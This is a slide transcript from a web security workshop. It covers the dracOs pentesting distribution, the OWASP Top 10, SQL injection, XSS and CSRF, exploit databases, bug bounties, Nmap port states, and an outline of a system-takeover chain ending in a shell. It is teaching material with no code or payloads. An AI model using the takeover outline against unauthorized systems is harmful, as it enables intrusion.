Web Security Workshop : A Jumpstart
-
Upload
satria-ady-pradana -
Category
Technology
-
view
285 -
download
0
Transcript of Web Security Workshop : A Jumpstart
![Page 1: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/1.jpg)
http://xathrya.id/ 1
Web Security WorkshopA Jumpstart!
Satria Ady Pradana
Lightweight and Powerful Penetration Testing OS
Xathrya
![Page 2: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/2.jpg)
2
# whoami?• Satria Ady Pradana
– Junior Security Analyst at MII (Metrodata Group)– Researcher at dracOS Dev Team– Staff ad Reversing.ID– Interest in low level stuffs
http://xathrya.id/
Lightweight and Powerful Penetration Testing OS
Xathrya
![Page 3: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/3.jpg)
http://xathrya.id/ 3
• Now tell me yours
Lightweight and Powerful Penetration Testing OS
Xathrya
![Page 4: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/4.jpg)
Dracos Linux is an open source operating system provides to penetration testing. Packed with a ton of pentest tools including information gathering, forensics, malware analysis, mantaining access, and reverse engineering.
We Live by Code and Rise by Ethic
Lightweight and Powerful Penetration Testing OS
Xathrya
![Page 5: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/5.jpg)
Lightweight and Powerful Penetration Testing OS
Unix-like operating system for various device and hardware.
Free and open source, under the license of GNU.
Made by Linux Torvalds in 1991.
LINUX :*
#screetsec Xathrya
![Page 6: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/6.jpg)
Lightweight and Powerful Penetration Testing OS
Making Linux Distrogreat again
#screetsec Xathrya
![Page 7: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/7.jpg)
Lightweight and Powerful Penetration Testing OS
Derivate or making a new distro base on existing other distro.
Had undergo some modification from the author that make it different from the parent distro.
Example : Remastering
#screetsec Xathrya
![Page 8: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/8.jpg)
Lightweight and Powerful Penetration Testing OS
• A way to build linux from the very start.
• Not derivating from existing distro,
• Initiated by Gerad Beckmans,
• Develop & assembly all part of system by yourself.
Linux From Scratch
#screetsec Xathrya
![Page 9: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/9.jpg)
Lightweight and Powerful Penetration Testing OS
• Teach yourself the inner of operating system.
• Flexible, do as you wish.
• Positively have full control of your system.
Advantages
#screetsec Xathrya
![Page 10: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/10.jpg)
• Open source
• Built from scratch
• Specially crafted for Cyber Security
INTRODUCING
#screetsec Xathrya
Lightweight and Powerful Penetration Testing OS
![Page 11: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/11.jpg)
Lightweight and Powerful Penetration Testing OS
THE PHILOSOPHY
#screetsec Xathrya
![Page 12: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/12.jpg)
Lightweight and Powerful Penetration Testing OS
The name dracOs comes from Dragon Comodos A rare species and can only be found in Indonesia archipelago. Inspired by Comodo character
• Strong enough to kill its prey with minimum force.• Its mouth has various bactery and virus to immediately kill the prey.
#screetsec Xathrya
![Page 13: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/13.jpg)
Lightweight and Powerful Penetration Testing OS
#screetsec Xathrya
![Page 14: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/14.jpg)
• Initiate the project on 12 June 2012 by Zico Ekel
• Remastering of Ubuntu 10.04
• Update dracOs v2.0 Beta still use Ubuntu
• Reinitiate the project on Desember 2015, did radical change, adopting LFS
HISTORY
#screetsec Xathrya
![Page 15: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/15.jpg)
Lightweight and Powerful Penetration Testing OS
STYLE OLD SCHOOL
#screetsec Xathrya
![Page 16: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/16.jpg)
Lightweight and Powerful Penetration Testing OS
WHY ?Xathrya
![Page 17: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/17.jpg)
Lightweight and Powerful Penetration Testing OS
I am a l33t h@ckerLMAO
#screetsec
Doing something But do not know what they are doing
Xathrya
![Page 18: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/18.jpg)
Lightweight and Powerful Penetration Testing OS
SOMEWHERE
Xathrya
![Page 19: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/19.jpg)
Lightweight and Powerful Penetration Testing OS
#screetsec Xathrya
![Page 20: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/20.jpg)
Lightweight and Powerful Penetration Testing OS
#screetsec Xathrya
![Page 21: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/21.jpg)
Lightweight and Powerful Penetration Testing OS
#screetsec Xathrya
![Page 22: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/22.jpg)
Lightweight and Powerful Penetration Testing OS
#screetsec Xathrya
![Page 23: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/23.jpg)
IT HAPPENS
![Page 24: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/24.jpg)
Lightweight and Powerful Penetration Testing OS
#screetsec
So... DRACOS LINUX
Xathrya
![Page 25: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/25.jpg)
Lightweight and Powerful Penetration Testing OS
#screetsec Xathrya
![Page 26: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/26.jpg)
FEATURES IN DRACOS
GTK MENU
#screetsec Xathrya
![Page 27: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/27.jpg)
FEATURES IN DRACOS
#screetsec Xathrya
![Page 28: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/28.jpg)
FEATURES IN DRACOS
#screetsec Xathrya
![Page 29: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/29.jpg)
FIRE UP THE VM
![Page 30: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/30.jpg)
# In this Lab• Install dracOs• Configure network (use NAT or bridge)• Ping my machine from dracOs• Try the user interface (DWM)• Install a package
http://xathrya.id/ 30
Lightweight and Powerful Penetration Testing OS
Xathrya
![Page 31: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/31.jpg)
ARE YOU A HACKER?
You might be, but I am not
![Page 32: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/32.jpg)
32
Information Security is Like Football
Formation = Framework- ISO/IEC 27001- NIST SP 800
(Computer Security)- PCI DSS- HIPAA- ISMF
GK-DEFENDER
MIDFIELDER
STRIKER
COACHSysadmin, Network, Firewall, SIEM, etc.
InfoSec Officer, Risk Management Internal,
Compliance, etc.
InfoSec Consultant, Pentester, etc.
Top Management, CISO
Supporter Soccer
Stakeholder
rungga_reksya
I am sure you are interest in offensive penetration tester.
Lightweight and Powerful Penetration Testing OS
![Page 33: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/33.jpg)
33
Three Critical Components for an Information Security
Integrity I A
C
Availability
Confidentiality
rungga_reksya
Lightweight and Powerful Penetration Testing OS
![Page 34: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/34.jpg)
34
Penetration Testing Methodologies and Standards
PENETRATIONTESTINGBLACKBOX WHITE BOX
GRAYBOX
rungga_reksya
Lightweight and Powerful Penetration Testing OS
![Page 35: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/35.jpg)
35
FrameworkPenetration Testing
Web Application Security Consortium Threat
Classification
Open Source Security Testing Methodology Manual
WASCOpen Web Application
Security Project Testing Guide
OSSTMM OWASP
rungga_reksya
![Page 36: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/36.jpg)
36
@rungga_reksya
OWASP Top 10 – 2010 (old) OWASP Top 10 – 2013 (New)
2010-A1 – Injection 2013-A1 – Injection
2010-A2 – Cross Site Scripting (XSS) 2013-A2 – Broken Authentication and Session Management
2010-A3 – Broken Authentication and Session Management 2013-A3 – Cross Site Scripting (XSS)
2010-A4 – Insecure Direct Object References 2013-A4 – Insecure Direct Object References
2010-A5 – Cross Site Request Forgery (CSRF) 2013-A5 – Security Misconfiguration
2010-A6 – Security Misconfiguration 2013-A6 – Sensitive Data Exposure
2010-A7 – Insecure Cryptographic Storage 2013-A7 – Missing Function Level Access Control
2010-A8 – Failure to Restrict URL Access 2013-A8 – Cross-Site Request Forgery (CSRF)
2010-A9 – Insufficient Transport Layer Protection 2013-A9 – Using Known Vulnerable Components (NEW)
2010-A10 – Unvalidated Redirects and Forwards (NEW) 2013-A10 – Unvalidated Redirects and Forwards
3 Primary Changes: Merged: 2010-A7 and 2010-A9 -> 2013-A6 Added New 2013-A9: Using Known Vulnerable
Components 2010-A8 broadened to 2013-A7
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Lightweight and Powerful Penetration Testing OS
![Page 37: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/37.jpg)
Lightweight and Powerful Penetration Testing OS
• Injecting snippet of SQL syntax to make the database give information to us, unintended by developer.
• Unsanitized input.• Things you should know
• Basic of SQL• Union• Specific things for DBMS• Unicode and character representation
SQL Injection
#screetsec Xathrya
![Page 38: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/38.jpg)
Lightweight and Powerful Penetration Testing OS
• Injecting client-side script into web page viewed by (other) user.
• Unsanitized input.• Things you should know
• Reflected• Persistent
Cross-Site Scripting (XSS)
#screetsec Xathrya
![Page 39: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/39.jpg)
Lightweight and Powerful Penetration Testing OS
• Unauthorized commands transmitted from a user that the website trusts thus tricking it as a valid and authorized command.
• Exploit the trust that a site has in user’s browser.• Things you should know
• Reflected• Persistent
Cross-Site Request Forgery (CSRF)
#screetsec Xathrya
![Page 40: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/40.jpg)
# In this Lab• Trying SQL Injection• Trying XSS• Trying CSRF
Your target is ...
http://xathrya.id/ 40
Lightweight and Powerful Penetration Testing OS
Xathrya
![Page 41: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/41.jpg)
When you are aimingProfessional Career
![Page 42: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/42.jpg)
42
Exploit Database36845 Exploit Archieved, 82454 CVE ID, 3000 Modules on Metasploit, etc.
https://www.exploit-db.com
https://packetstormsecurity.com
https://cve.mitre.org https://www.rapid7.com/db/
modules
Exploit DB Packet Storm
Common Vulnerabiliti
es & Exposures
Rapid 7
rungga_reksya
41 2 3
Lightweight and Powerful Penetration Testing OS
![Page 43: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/43.jpg)
43
Bug Bounty Programs
https://bugcrowd.com
Bug Crowd
http://bugsheet.comBug Sheet
https://hackerone.comHacker One
https://firebounty.com
Fire Bounty
https://bountyfactory.io
Bounty Factory
https://www.openbugbounty.org
Open Bug Bounty
rungga_reksya
Lightweight and Powerful Penetration Testing OS
![Page 44: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/44.jpg)
44
Concept of Takeover System
PWN
SVR
SQL Injection
Make FormUpload
Phishing
XSS
Login toMYSQL
SHELL
Login toAPP
UploadFile
rungga_reksya
Lightweight and Powerful Penetration Testing OS
![Page 45: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/45.jpg)
45
PORTSTATE
S
1Open: This indicates that an application is listening for connections on this port.
3Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by somekind of filtering.
5Open/Filtered:This indicates that the port was filtered or open but Nmap couldn't establish the state.
2Closed: This indicates that the probes were received but there is no application listening on this port.
4 Unfiltered: This indicates that the probes were received but a state could not be established.
6Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn't establish the state.
rungga_reksya
NMAP Features
45Lightweight and Powerful Penetration Testing OS
![Page 46: Web Security Workshop : A Jumpstart](https://reader036.fdocuments.in/reader036/viewer/2022070600/58d104ac1a28ab823e8b4a67/html5/thumbnails/46.jpg)
# In this Lab• Good Luck!
http://xathrya.id/ 46
Lightweight and Powerful Penetration Testing OS
Xathrya